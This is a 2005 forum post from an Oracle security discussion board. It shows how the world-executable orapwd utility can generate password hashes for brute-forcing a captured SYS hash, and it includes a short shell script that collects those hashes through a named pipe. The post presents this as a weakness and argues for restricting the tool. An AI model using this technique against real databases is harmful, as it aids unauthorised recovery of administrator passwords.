Oracle Security is easier if you design for it
View Profile | WWW | Email
orapwd to crack sys hash?
« on: Sep 20th, 2005, 1:51pm »
Quote | Modify
I've being playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exists its created, if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happens to have the hash value of SYS's password (very unprobable I think) you could generate all posible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 password, from A to Z, and it took 0.6 seconds):
# Auteur: I.A. Saez Scheihing
mknod pijp p
while true; do cat < pijp >> output.txt; done &
orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
# end script
So after 'password=' you could try all password combinations. After completion you would find all posible hashes in file output.txt!
By the way:
I don't think every one should be allowd to execute orapwd. This tool is meant for oracle only.